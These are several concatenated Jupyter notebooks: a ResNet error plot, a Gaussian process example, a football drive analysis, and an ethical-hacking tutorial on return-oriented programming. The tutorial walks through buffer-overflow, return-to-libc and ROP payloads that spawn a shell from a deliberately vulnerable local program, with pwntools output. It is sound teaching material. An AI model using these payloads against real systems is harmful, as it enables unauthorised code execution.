        # termination at 64k iter, according to the paper
        if iteration > 64000:
            print("Test Error: {:.2f}%".format(model_test_error[-1]))
            #torch.save(net.state_dict(), "./resnet.pth")
            break
    train_error.append(model_train_error)
    test_error.append(model_test_error)
    del net
# +
it = [i*300 for i in list(range(1, 214))]
# I did not use for-loop, just to clearly show there are 8 networks in experiment.
# Truncate every curve to its first 213 samples (one point per 300
# iterations) so all series share the same x-axis length as ``it``.
net1_train_error = train_error[0][:213]
net2_train_error = train_error[1][:213]
net3_train_error = train_error[2][:213]
net4_train_error = train_error[3][:213]
net1_test_error = test_error[0][:213]
net2_test_error = test_error[1][:213]
net3_test_error = test_error[2][:213]
net4_test_error = test_error[3][:213]
#net5_train_error = train_error[0][:213]
#net6_train_error = train_error[1][:213]
#net7_train_error = train_error[2][:213]
#net8_train_error = train_error[3][:213]
#net5_test_error = test_error[0][:213]
#net6_test_error = test_error[1][:213]
#net7_test_error = test_error[2][:213]
#net8_test_error = test_error[3][:213]
# +
# Thin lines: training error; thick lines: test error (one color per depth).
fig = plt.figure(figsize=(12,8))
plt.plot(it, net1_train_error, 'b', linewidth=0.5)
plt.plot(it, net1_test_error, 'b', linewidth=2, label='plain-20')
plt.plot(it, net2_train_error, 'g',linewidth=0.5)
plt.plot(it, net2_test_error, 'g', linewidth=2, label='plain-32')
plt.plot(it, net3_train_error, 'r', linewidth=0.5)
plt.plot(it, net3_test_error, 'r', linewidth=2, label='plain-44')
plt.plot(it, net4_train_error, 'c', linewidth=0.5)
plt.plot(it, net4_test_error, 'c', linewidth=2, label='plain-56')
#plt.plot(it, net5_train_error, 'b', linewidth=0.5)
#plt.plot(it, net5_test_error, 'b', linewidth=2, label='ResNet-20')
#plt.plot(it, net6_train_error, 'g',linewidth=0.5)
#plt.plot(it, net6_test_error, 'g', linewidth=2, label='ResNet-32')
#plt.plot(it, net7_train_error, 'r', linewidth=0.5)
#plt.plot(it, net7_test_error, 'r', linewidth=2, label='ResNet-44')
#plt.plot(it, net8_train_error, 'c', linewidth=0.5)
#plt.plot(it, net8_test_error, 'c', linewidth=2, label='ResNet-56')
# Clip the y-axis to 0-25% error so the depth comparison is readable.
plt.ylim(0, 25)
plt.legend(loc='lower left')
fig.savefig('error.png')
plt.show()
# -
|
AI502/ResNet/main2.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Return Oriented Programming (ROP)
# - [https://en.wikipedia.org/wiki/Return-oriented_programming](https://en.wikipedia.org/wiki/Return-oriented_programming)
# - [Return-Oriented Programming: Systems, Languages, and Applications](https://hovav.net/ucsd/dist/rop.pdf)
# - advanced version of stack overflow or stack smashing attack
# - a security exploit technique that allows an attacker to execute code in the presence of security defenses such as executable protection and code signing
# - attackers hijack the program's return control flow and then execute carefully chosen machine instruction sequences that are already present in the machine's memory, called `gadgets`
#
# ## Return-to-libc attack
# - if the stack property is set as RW (Read and Write, by default), it is impossible to smuggle the shellcode into the buffer and use it to exploit the vulnerable program
# - shared libraries such as libc often contain subroutines for performing system calls and other functionality potentially useful to an attacker
# - we'll use c-program for this demonstration because most CTF platforms use C programs
# - in a `return-to-libc` attack, the attacker chooses an available library function and overwrites the return address with its entry location
# - function calls can be carefully combined and chained using the `rop gadgets`
# - to make the demo easier, the `ctf-demos/rop1/vuln.c` program already exposes the `system()` and `printf()` addresses in libc, and the `main()` address, when the program is loaded in memory
# - NOTE: the program and note is adapted from: [https://tc.gts3.org/cs6265/2019/tut/tut06-01-rop.html](https://tc.gts3.org/cs6265/2019/tut/tut06-01-rop.html)
# ! cat ctf-demos/rop1/vuln.c
# - use the Makefile provided in the `ctf-demos/rop1` folder to compile the c program
# - note that the gcc compiler switch `-z execstack` is removed from the Makefile
# - this make the stack RW only thus protecting from smuggling attacker's arbitrary code
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ sudo make
# # must run make with sudo to disable randomaize_va_space
# # #echo 0 | tee /proc/sys/kernel/randomize_va_space
# gcc -g -Wall -m32 -fno-stack-protector -no-pie vuln.c -o vuln.exe -ldl
#
# ```
#
# - double check to make sure NX is enabled
# - one can't place shellcode in either the stack or the heap
# - however, stack protector is disabled allowing us to still hijack the control flow
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ checksec vuln.exe 2 ⨯
# [*] '/home/kali/EthicalHacking/ctf-demos/rop1/vuln.exe'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
# ```
# - run and crash the program to confirm overflow vulnerability
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe AAAA
# stack : 0xffffc3f0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>
# Invalid Password!
# Good bye!
# ```
#
# - try with longer data
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'print("A"*100)')
# stack : 0xffffc390
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>
# Invalid Password!
# zsh: segmentation fault ./vuln.exe $(python -c 'print("A"*100)')
# ```
# - check the EIP value when the program crashed
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ dmesg
#
# ...
# [44824.285344] vuln.exe[23971]: segfault at 41414141 ip 0000000041414141 sp 00000000ffffc340 error 14 in libc-2.31.so[f7dc2000+1d000]
# ...
# ```
# - notice 41414141 is the value of EIP when the function tries to return to this address
# - let's try to return to main() with argument the address of "/bin/sh"
# - payload should look like this:
# ```
# [data ]
# [... ]
# [ra ] -> main()
# ```
#
# - find the offset to the return address or EIP using gdb-peda
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ gdb -q vuln.exe
# Reading symbols from vuln.exe...
#
# gdb-peda$ pattern arg 200
# Set 1 arguments to program
#
# gdb-peda$ run
# ...
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41414641 in ?? ()
#
# gdb-peda$ patts
# Registers contain pattern buffer:
# ECX+52 found at offset: 69
# EDX+52 found at offset: 69
# EBX+0 found at offset: 36
# EBP+0 found at offset: 40
# EIP+0 found at offset: 44
# Registers point to pattern buffer:
# [ESP] --> offset 48 - size ~152
# [ESI] --> offset 128 - size ~72
# Pattern buffer found at:
# 0x0804d1b2 : offset 0 - size 200 ([heap])
# 0xf7fb00a9 : offset 33208 - size 4 (/usr/lib32/libdl-2.31.so)
# 0xffffc240 : offset 0 - size 200 ($sp + -0x30 [-12 dwords])
# 0xffffc5ed : offset 0 - size 200 ($sp + 0x37d [223 dwords])
# References to pattern buffer found at:
# 0xffffc368 : 0xffffc5ed ($sp + 0xf8 [62 dwords])
#
# ```
# - 44 is the offset to EIP that gets us to the return address from the buffer's base address
#
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'import sys; sys.stdout.buffer.write(b"A"*44+b"\x56\x92\x04\x08")') 139 ⨯
# stack : 0xffffc3c0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<PASSWORD>�
# Invalid Password!
# stack : 0xffffc374
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# zsh: segmentation fault ./vuln.exe
# ```
#
# - note the main is called right after Invalid Password! is printed and we get segfault after that
#
# - let's print out "Password OK :)"
# - payload should look like this:
#
# ```
# [data ]
# [..... ]
# [ra ] -> printf()
# [dummy ]
# [arg1 ] -> "Password OK :)"
# ```
#
# - printf() address is already printed, now we need to find the address of the literal string "Password OK :)" in the program
# - we'll use gdb-peda's find function
# - for dummy value we can use the exit() address and simply exit the program
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ gdb -q vuln.exe
# Reading symbols from vuln.exe...
#
# gdb-peda$ run
#
# gdb-peda$ find "Password OK :)"
# Searching for 'Password OK :)' in: None ranges
# Found 2 results, display max 2 items:
# vuln.exe : 0x804a03e ("Password OK :)")
# vuln.exe : 0x804b03e ("Password OK :)")
#
# ```
#
# - can use one of the addresses found; let's use the first address found
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'import sys; sys.stdout.buffer.write(b"A"*44 + b"\x80\x5f\xe1\xf7" + b"\xb0\x98\xdf\xf7" + b"\x3e\xa0\x04\x08")')
# stack : 0xffffc3c0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>������>�
# Invalid Password!
# Password OK :)
# ```
#
# - we forced the program to print "Password OK :)" string instead of "Invalid Password!"
#
# ## Your first ROP
# - force the vulnerable program execute to system function, e.g.:
#
# ```
# system("/bin/sh")
# ```
#
# - we need the address of `system()` and the address of `"/bin/sh"`
# - address of `system()` is already leaked but can also be found using gdb-peda
# - address of `"/bin/sh"` can be found in `libc` library loaded along with the program in memory
# - we can use gdb-peda to find the address of such strings to be used as argument to system
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ gdb -q vuln.exe
# Reading symbols from vuln.exe...
# gdb-peda$ run
#
# ...
#
# gdb-peda$ find "/bin/sh" libc
# Searching for '/bin/sh' in: libc ranges
# Found 1 results, display max 1 items:
# libc : 0xf7f4e33c ("/bin/sh")
#
# gdb-peda$ p system
# $1 = {<text variable, no debug info>} 0xf7e06f60 <system>
# gdb-peda$ p exit
# $2 = {<text variable, no debug info>} 0xf7df98b0 <exit>
# gdb-peda$ p main
# $3 = {int (int, char **)} 0x8049256 <main>
# gdb-peda$ p printf
# $4 = {<text variable, no debug info>} 0xf7e15f80 <printf>
#
# ```
#
# - now we've all the pointers, let's create our payload
#
# ```
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'import sys; sys.stdout.buffer.write(b"A"*44 + b"\x60\x6f\xe0\xf7" + b"\xb0\x98\xdf\xf7" + b"\x3c\xe3\xf4\xf7")')
# stack : 0xffffc3c0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>`o������<���
# Invalid Password!
# $ whoami
# kali
# $ ls
# core exploit.bin Makefile peda-session-demo.exe.txt ropchain vuln.exe
# demo.exe exploit.py pattern.txt peda-session-vuln.exe.txt vuln.c
# $ exit
# ```
# ## ROP Chain
# - find and chain `pop, ret` instructions called gadgets to keep maintaining our payloads
# - hence the name return-oriented programming (ROP)
#
# - think about:
#
# ```
# [buf ]
# [..... ]
# [old-ra ] -> 1) func1
# [ra ] -------------------> 2) func2
# [old-arg1 ] -> 1) arg1
# [arg1 ] -> arg1
#
# 1) func1(arg1)
# 2) func2(arg1)
# 3) crash @func1's arg1 (old-arg1)
# ```
#
# - after func2(arg1), `old-arg1` will be our next return address in the payload
# - a neat trick is to use `pop/ret` gadget
#
# ```
# [buf ]
# [..... ]
# [old-ra ] -> 1) func1
# [ra ] ------------------> pop/ret gadget
# [old-arg1 ] -> 1) arg1
# [dummy ]
#
# * crash at dummy!
# ```
#
# - in this case, after func1(arg1), it returns to 'pop/ret' instructions, which 1) pop 'old-arg1' (note the stack pointer points to 'dummy') and 2) returns again (i.e., crashing at dummy)
#
# - we can chain func2 by hijacking its control-flow to func2
#
# ```
# [buf ]
# [..... ]
# [old-ra ] -> 1) func1
# [ra ] ------------------> pop/ret gadget
# [old-arg1 ] -> 1) arg1
# [ra ] -> func2
# [dummy ]
# [arg1 ] -> arg1
# ```
#
# - let's search for `pop/ret` gadgets using ropper program
# - there are many `pop/ret` instructions in a given program
#
# ```bash
#
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ropper -f ./vuln.exe
#
# ...
# 0x0804901e: pop ebx; ret;
# ...
#
# 155 gadgets found
#
# ```
#
# - let's chain the gadgets to create the final payload that looks like the following
#
# ```
# [buf ]
# [..... ]
# [old-ra ] -> 1) system
# [ra ] -----------------> pop/ret
# [old-arg1 ] -> 1) "/bin/sh"
# [ra ] -> 2) exit
# [dummy ]
# [arg1 ] -> 0
# ```
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$ ./vuln.exe $(python -c 'import sys; sys.stdout.buffer.write(b"A"*44 + b"\x60\x6f\xe0\xf7" + b"\x1e\x90\x04\x08" + b"\x3c\xe3\xf4\xf7" + b"\xb0\x98\xdf\xf7" + b"AAAA" + b"0")')
#
# stack : 0xffffc3b0
# system(): 0xf7e06f60
# printf(): 0xf7e15f80
# exit(): 0xf7df98b0
# main(): 0x8049256
# IOLI Crackme Level 0x00
# Password:Entered: <PASSWORD>`o��<�������AAAA0
# Invalid Password!
# $ whoami
# kali
# $ exit
#
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop1]
# └─$
# ```
#
# ## Exercise
#
# - Chain three functions and invoke one at a time in a sequence listed below:
#
# ```C
# printf("Password OK :)")
# system("/bin/sh")
# exit(0)
# ```
# ## ROP with Pwntools
# - pwntools can be used to exploit stackoverflow with ROP technique
# - let's use the `ctf-demos/rop2/vuln.c` program to demonstrate pwntools
# - also see this YouTube video - [https://www.youtube.com/watch?v=gWU2yOu0COk&ab_channel=ChristopherSchafer](https://www.youtube.com/watch?v=gWU2yOu0COk&ab_channel=ChristopherSchafer)
# - since the exploit doesn't rely on any static addresses, it's reliable enough that it'll work even if ASLR is turned off
# - let's turn the ASLR off
# ! echo kali | sudo -S bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space'
# ! echo kali | sudo -S cat /proc/sys/kernel/randomize_va_space
# - create offset using `pwn template`
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ pwn template ./vuln.exe --host localhost --port 1234 > exploit.py
# ```
#
# - update and run exploit.py locally in DEBUG mode
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ python exploit.py LOCAL DEBUG
# [DEBUG] PLT 0x8049030 fflush
# [DEBUG] PLT 0x8049040 gets
# [DEBUG] PLT 0x8049050 getegid
# [DEBUG] PLT 0x8049060 puts
# [DEBUG] PLT 0x8049070 __libc_start_main
# [DEBUG] PLT 0x8049080 setresgid
# [*] '/home/kali/EthicalHacking/ctf-demos/rop_basic/vuln.exe'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
# [+] Starting local process '/home/kali/EthicalHacking/ctf-demos/rop_basic/vuln.exe': pid 12899
# [*] Loaded 10 cached gadgets for './vuln.exe'
# [DEBUG] PLT 0x25040 realloc
# [DEBUG] PLT 0x25090 __tls_get_addr
# [DEBUG] PLT 0x250d0 memalign
# [DEBUG] PLT 0x250e0 _dl_exception_create
# [DEBUG] PLT 0x25120 __tunable_get_val
# [DEBUG] PLT 0x251e0 _dl_find_dso_for_object
# [DEBUG] PLT 0x25220 calloc
# [DEBUG] PLT 0x25300 __libpthread_freeres
# [DEBUG] PLT 0x25308 malloc
# [DEBUG] PLT 0x25310 __libdl_freeres
# [DEBUG] PLT 0x25318 free
# [*] '/home/kali/EthicalHacking/ctf-demos/rop_basic/libc.so.6'
# Arch: amd64-64-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [DEBUG] Received 0x13 bytes:
# b'Give me some text:\n'
# [DEBUG] Sent 0x91 bytes:
# 00000000 61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61 │aaaa│baaa│caaa│daaa│
# 00000010 65 61 61 61 66 61 61 61 67 61 61 61 68 61 61 61 │eaaa│faaa│gaaa│haaa│
# 00000020 69 61 61 61 6a 61 61 61 6b 61 61 61 6c 61 61 61 │iaaa│jaaa│kaaa│laaa│
# 00000030 6d 61 61 61 6e 61 61 61 6f 61 61 61 70 61 61 61 │maaa│naaa│oaaa│paaa│
# 00000040 71 61 61 61 72 61 61 61 73 61 61 61 74 61 61 61 │qaaa│raaa│saaa│taaa│
# 00000050 75 61 61 61 76 61 61 61 77 61 61 61 78 61 61 61 │uaaa│vaaa│waaa│xaaa│
# 00000060 79 61 61 61 7a 61 61 62 62 61 61 62 63 61 61 62 │yaaa│zaab│baab│caab│
# 00000070 64 61 61 62 65 61 61 62 66 61 61 62 67 61 61 62 │daab│eaab│faab│gaab│
# 00000080 68 61 61 62 69 61 61 62 6a 61 61 62 1b 92 04 08 │haab│iaab│jaab│····│
# 00000090 0a │·│
# 00000091
# [DEBUG] Received 0xa4 bytes:
# 00000000 61 61 61 61 62 61 61 61 63 61 61 61 64 61 61 61 │aaaa│baaa│caaa│daaa│
# 00000010 65 61 61 61 66 61 61 61 67 61 61 61 68 61 61 61 │eaaa│faaa│gaaa│haaa│
# 00000020 69 61 61 61 6a 61 61 61 6b 61 61 61 6c 61 61 61 │iaaa│jaaa│kaaa│laaa│
# 00000030 6d 61 61 61 6e 61 61 61 6f 61 61 61 70 61 61 61 │maaa│naaa│oaaa│paaa│
# 00000040 71 61 61 61 72 61 61 61 73 61 61 61 74 61 61 61 │qaaa│raaa│saaa│taaa│
# 00000050 75 61 61 61 76 61 61 61 77 61 61 61 78 61 61 61 │uaaa│vaaa│waaa│xaaa│
# 00000060 79 61 61 61 7a 61 61 62 62 61 61 62 63 61 61 62 │yaaa│zaab│baab│caab│
# 00000070 64 61 61 62 65 61 61 62 66 61 61 62 67 61 61 62 │daab│eaab│faab│gaab│
# 00000080 68 61 61 62 69 61 61 62 6a 61 61 62 1b 92 04 08 │haab│iaab│jaab│····│
# 00000090 0a 47 69 76 65 20 6d 65 20 73 6f 6d 65 20 74 65 │·Giv│e me│ som│e te│
# 000000a0 78 74 3a 0a │xt:·│
# 000000a4
# [DEBUG] Sent 0x12 bytes:
# b'Do you read this?\n'
# [*] Switching to interactive mode
# Give me some text:
# [DEBUG] Received 0x12 bytes:
# b'Do you read this?\n'
# Do you read this?
# [*] Got EOF while reading in interactive
# ```
#
# - update payload and interactively send the payload to the vulnerable program locally first
# - the updated exploit code is exploit2.py
# - run the exploit code with LOCAL argument
#
# ```bash
# ┌──(kali㉿)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ python exploit2.py LOCAL
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe'
# Arch: i386-32-little
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe'
# Arch: i386-32-little
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
# [+] Starting local process '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe': pid 36202
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/libc.so.6'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [*] Loaded 10 cached gadgets for './vuln.exe'
# [*] Puts at address: 0xf7e38380
# [*] libc base address: 0xf7dc8000
# [*] Stage II ROP Chain:
# 0x0000: 0xf7e0cf60 0xf7e0cf60(0xf7f5433c)
# 0x0004: b'baaa' <return address> 0x0008: 0xf7f5433c arg0
# [*] Switching to interactive modeGive me some text:
# aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab`\xcf\xe0\xf7baaa<C\xf5\xf7xploit.py Makefile vuln.c
# $ ls
# core exploit.py Makefile vuln.c
# exploit1.py libc.py pattern.txt vuln.exe
# exploit2.py libc.so.6 peda-session-vuln.exe.txt
# $ whoami
# kali
# ```
# ### Remote Exploit
#
# - run netcat-loop.sh program from one terminal
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ bash netcat-loop.sh
# listening on [any] 1234 ...
# ```
#
# - run the exploit2.py code from another terminal without any argument
#
# ```bash
# ┌──(kali㉿)-[~/EthicalHacking/ctf-demos/rop2]
# └─$ python exploit2.py
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/vuln.exe'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: No canary found
# NX: NX enabled
# PIE: No PIE (0x8048000)
# [+] Opening connection to localhost on port 1234: Done
# [*] '/home/kali/EthicalHacking/ctf-demos/rop2/libc.so.6'
# Arch: i386-32-little
# RELRO: Partial RELRO
# Stack: Canary found
# NX: NX enabled
# PIE: PIE enabled
# [*] Loaded 10 cached gadgets for './vuln.exe'
# [*] Puts at address: 0xf7e38380
# [*] Loaded 10 cached gadgets for './vuln.exe'
# [*] Puts at address: 0xf7e38380
# [*] libc base address: 0xf7dc8000
# [*] Stage II ROP Chain:
# 0x0000: 0xf7e0cf60 0xf7e0cf60(0xf7f5433c)
# 0x0004: b'baaa' <return address>
# 0x0008: 0xf7f5433c arg0
# [*] Switching to interactive modeGive me some text:
# aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab`\xcf\xe0\xf7baaa<C\xf5\xf7
# $ ls
# core
# exploit1.py
# exploit2.py
# exploit.py
# libc.py
# libc.so.6
# Makefile
# netcat-loop.sh
# pattern.txt
# peda-session-vuln.exe.txt
# vuln.c
# vuln.exe
# $
# ```
#
# ## Exercise
# - Write Python exploit code with using pwntools to exploit ctf-demos/rop1/vuln.c program
|
ROP.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Info
#
# 2D example of vhgpr
import numpy as np
from sklearn.gaussian_process import GaussianProcessRegressor
from sklearn.gaussian_process.kernels import WhiteKernel, RBF, ConstantKernel as C
import matplotlib.pyplot as plt
from vhgpr import VHGPR
from fourbranches import f, mean, std
plt.rcParams.update({'font.size': 16})
# ### Data
np.random.seed(1)  # fixed seed so the sampled design points are reproducible
DX = np.random.rand(600, 2) * 10 - 5  # 600 design points, uniform on [-5, 5]^2
DY = f(DX)  # observations of the four-branches test function at DX (f imported from fourbranches)
# ### Model
# Kernel for the latent mean process f: constant (variance) times RBF.
kernelf = C(10.0, (1e-1, 1e2)) * RBF((5), (1e-1, 1e2))
# Kernel for the second latent process g -- presumably the heteroscedastic
# log-noise process; confirm against the vhgpr implementation.
kernelg = C(2, (1e-1, 1e1)) * RBF((2), (1e-1, 1e1))
model = VHGPR(kernelf, kernelg) # fit 5 times
model.fit(DX, DY)
# ### Prediction and plot
grid = 80  # resolution per axis of the evaluation grid
x = np.linspace(-5, 5, grid)
y = np.linspace(-5, 5, grid)
meshx, meshy = np.meshgrid(x,y)
# True values in grids (mean/std evaluated point by point on the mesh)
truefunc_mean = [[mean(np.array([[j,i]]))[0] for j in x]for i in y]
truefunc_std = [[std(np.array([[j,i]]))[0] for j in x]for i in y]
# Predictions in grids: flatten the mesh to (grid**2, 2) for a single predict call
meshsample = np.array([[[j,i] for j in x] for i in y])
predresults = model.predict(meshsample.reshape(grid**2, 2))
predfunc_mean = predresults[0].reshape(grid, grid)  # predicted mean surface
# predresults[2] appears to be a predicted log-variance (exp then sqrt -> std) -- TODO confirm against vhgpr docs
predfunc_std = np.sqrt(np.exp(predresults[2].reshape(grid, grid)))
# +
plt.figure(figsize = (6,6))
# Overlay true (black) vs predicted (red) contours of the mean function.
axes1 = plt.contour(meshx, meshy, truefunc_mean, colors="Black")
axes2 = plt.contour(meshx, meshy, predfunc_mean, colors="Red")
plt.clabel(axes1)
plt.clabel(axes2)
plt.title('mean func')
# NOTE(review): `ContourSet.collections` is deprecated in matplotlib >= 3.8;
# these legend proxies may need replacing on newer matplotlib versions.
lines = [ axes1.collections[0], axes2.collections[0]]
labels = ['True', 'Prediction']
plt.legend(lines, labels)
plt.show()
plt.figure(figsize = (6,6))
# Same comparison for the noise std surface, with training locations overlaid.
axes1 = plt.contour(meshx, meshy, truefunc_std, colors="Black")
axes2 = plt.contour(meshx, meshy, predfunc_std, colors="Red")
plt.scatter(DX[:,0], DX[:,1], s=6)
plt.clabel(axes1)
plt.clabel(axes2)
plt.title('std func')
lines = [ axes1.collections[0], axes2.collections[0]]
labels = ['True', 'Prediction']
plt.legend(lines, labels)
plt.show()
# -
|
example_2d.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
# `DataFrame.append` was deprecated and removed in modern pandas; build the
# combined 2016-2019 play-by-play table with a single concat instead
# (identical result: indices are preserved, just like chained append calls).
pbp_data = pd.concat(
    [pd.read_csv(f'data/pbp/{year}.csv', sep=",", encoding='iso-8859-1')
     for year in (2019, 2018, 2017, 2016)]
)
pbp_data.id.nunique()
# -
pbp_data.head()
# Despite the name, this only drops rows with down == 0 (presumably kickoffs /
# PATs -- TODO confirm what down 0 encodes in this dataset); the actual
# garbage-time filter further below is commented out.
non_garbage_time_data = pbp_data[
    pbp_data.down != 0
]
non_garbage_time_data.id.nunique()
# +
# garbage_time_data = non_garbage_time_data[
# ((abs(non_garbage_time_data.offense_score - non_garbage_time_data.defense_score) >= 38) & (non_garbage_time_data.period == 2))
# | ((abs(non_garbage_time_data.offense_score - non_garbage_time_data.defense_score) >= 28) & (non_garbage_time_data.period == 3))
# | ((abs(non_garbage_time_data.offense_score - non_garbage_time_data.defense_score) >= 22) & (non_garbage_time_data.period == 4))
# ]
# print(non_garbage_time_data.id.nunique())
# print(garbage_time_data.id.nunique())
# non_garbage_time_data.drop(garbage_time_data.index, inplace=True)
# print(non_garbage_time_data.id.nunique())
# -
# Share of plays on each down (1st-4th), by unique play id.
downs = [1, 2, 3, 4]
for down in downs:
    plays_on_down = non_garbage_time_data[non_garbage_time_data.down == down]
    share = 100 * plays_on_down.id.nunique() / non_garbage_time_data.id.nunique()
    print(f"number of instances of down {down}: {plays_on_down.id.nunique()} ({share}%)")
# Drive-level data for the same four seasons; `pd.concat` replaces the removed
# `DataFrame.append` API (identical result, indices preserved).
drive_data = pd.concat(
    [pd.read_csv(f'data/drives/{year}.csv', sep=",", encoding='iso-8859-1')
     for year in (2019, 2018, 2017, 2016)]
)
drive_data.head()
# drive_data.drive_result.value_counts(normalize=True)
# cleaned_yards = drive_data.start_yardline.apply(lambda x: x % 50)
drive_data.start_yardline.value_counts(bins=[0,10,20,30,40,50])
# +
# Attach home/away team info to each drive so the recorded yardlines can be
# normalised to the offense's perspective.
new_df = pd.merge(
    drive_data,
    non_garbage_time_data[['drive_id','away','home']],
    left_on='id',
    right_on='drive_id',
)
# When the away team is on offense, flip both endpoints so 0 is always the
# offense's own goal line and 100 the opponent's.
away_offense = new_df.offense == new_df.away
new_df.loc[away_offense, ['start_yardline']] = 100 - new_df.start_yardline
new_df.loc[away_offense, ['end_yardline']] = 100 - new_df.end_yardline
new_df.head()
# +
# %matplotlib inline
import numpy as np
from matplotlib import colors
from matplotlib.ticker import PercentFormatter
import matplotlib.pyplot as plt
# Collapse the play-level merge back down to one row per drive.
coll_df = new_df.drop_duplicates(subset='id')
coll_df.head()
# Side-by-side histograms of drive starting position: raw counts vs density.
fig, axs = plt.subplots(1, 2, sharey=False, tight_layout=True)
# We can set the number of bins with the `bins` kwarg
axs[0].hist(coll_df.start_yardline, bins=10)
# # We can also normalize our inputs by the total number of counts
axs[1].hist(coll_df.start_yardline, bins=10, density=True)
# # Now we format the y-axis to display percentage
axs[1].yaxis.set_major_formatter(PercentFormatter(xmax=1))
axs[0].set_xlabel('Starting yard line')
axs[0].set_ylabel('Frequency')
axs[1].set_xlabel('Starting yard line')
axs[1].set_ylabel('Density')
# -
coll_df.start_yardline.value_counts(bins=[0,10,20,30,40,50,60,70,80,90,100])
coll_df.drive_result.value_counts()
# Drives ending in any score (offensive or defensive). `isin` replaces the
# original chain of `|`-ed equality comparisons -- identical selection,
# clearer intent.
scoring_drives = coll_df[coll_df.drive_result.isin(
    ['TD', 'FG', 'SF', 'FUMBLE TD', 'INT TD', 'DOWNS TD']
)]
scoring_drives.id.nunique()
# 100 evenly spaced edges from 1 to 100 -> 99 one-yard-wide bins.
cust_bins = np.linspace(1,100,100)
cust_bins
# +
# Probability of an offensive TD drive given starting yard line within one of these bins
def prob(prb1, prb2):
    """Simple ratio helper: return prb1 divided by prb2."""
    ratio = prb1 / prb2
    return ratio
# TD drives counted per 1-yard starting bin.
td = coll_df[
    (coll_df.drive_result == 'TD')
].start_yardline.value_counts(bins=cust_bins)
td_vars = pd.DataFrame({'yardline_bin':td.index, 'td_frequency':td.values})
